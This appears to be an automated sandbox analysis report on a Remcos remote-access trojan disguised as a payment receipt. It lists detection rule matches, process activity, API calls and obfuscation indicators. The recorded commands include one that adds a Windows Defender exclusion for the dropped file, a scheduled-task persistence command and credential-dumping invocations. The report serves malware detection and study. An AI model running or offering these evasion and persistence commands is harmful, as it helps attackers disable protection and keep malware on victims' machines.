                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: SwiftCopy_PaymtRecpt121228.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: eaJOpx.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, DlfsjvW8qU2neLHntS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, DlfsjvW8qU2neLHntS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, DlfsjvW8qU2neLHntS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@24/14@1/2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A64F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile created: C:\Users\user\AppData\Roaming\eaJOpx.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYE
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: \Sessions\1\BaseNamedObjects\gOVBITLvpzfJPRJ
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDCEE.tmpJump to behavior
Source: SwiftCopy_PaymtRecpt121228.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000011.00000002.4041301515.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SwiftCopy_PaymtRecpt121228.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File read: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\eaJOpx.exe C:\Users\user\AppData\Roaming\eaJOpx.exe
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Process created: C:\Users\user\AppData\Roaming\eaJOpx.exe "C:\Users\user\AppData\Roaming\eaJOpx.exe"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, textshaping.dll, ntmarta.dll, sspicli.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, gpapi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, iphlpapi.dll, sspicli.dll, mswsock.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, uxtheme.dll, windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, miutils.dll, gpapi.dll
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, textshaping.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Section loaded: winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, iphlpapi.dll, kernel.appcore.dll
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: version.dll, wininet.dll, windows.storage.dll, wldp.dll, sspicli.dll, iertutil.dll, kernel.appcore.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, pstorec.dll, vaultcli.dll, wintypes.dll, dpapi.dll, msasn1.dll
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: windows.storage.dll, wldp.dll, pstorec.dll, sspicli.dll, msasn1.dll, msasn1.dll, windows.storage.dll, wldp.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.cfgJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: SwiftCopy_PaymtRecpt121228.exeStatic file information: File size 1193984 > 1048576
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x112400
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pUIh.pdbSHA256y` source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
                Source: Binary string: pUIh.pdb source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr

                Data Obfuscation

Source: SwiftCopy_PaymtRecpt121228.exe, Form11.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: eaJOpx.exe.0.dr, Form11.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs | .Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs | .Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs | .Net Code: X2iKjixfC7 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCF3
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_05A54F7A pushad ; iretd 0_2_05A54F81
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_05A548E0 pushad ; retf 0_2_05A548E1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_05A54848 push eax; retf 0_2_05A54849
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_05A5BA98 push esp; iretd 0_2_05A5BAA5
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_06EFD7AD push es; iretd 0_2_06EFD7E8
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_06EFD5EA push esi; ret 0_2_06EFD5ED
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_06EFDDE0 push eax; retf 0_2_06EFDDE1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_06EFD5A0 push es; iretd 0_2_06EFD5B4
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 0_2_06EFD825 push es; iretd 0_2_06EFD82C
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10002806 push ecx; ret 7_2_10002819
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C24658 push edx; retf 0002h 9_2_02C2465A
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C247B0 push esi; retf 0002h 9_2_02C247B2
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C24779 push esi; retf 0002h 9_2_02C2477A
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C29873 pushfd ; retf 9_2_02C29876
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C25F23 pushfd ; retf 9_2_02C25F26
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_02C29D01 pushfd ; retf 0002h 9_2_02C29D02
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_060A9608 push cs; retf 9_2_060A9616
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_060A4F7B pushad ; iretd 9_2_060A4F81
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_060ABA98 push esp; iretd 9_2_060ABAA5
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_060A4848 push eax; retf 9_2_060A4849
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_060A48E0 pushad ; retf 9_2_060A48E1
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758D5EA push esi; ret 9_2_0758D5ED
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758DDE0 push eax; retf 9_2_0758DDE1
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07583B02 push cs; retf 9_2_07583B0E
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779DE43 pushfd ; retf 9_2_0779DE4E
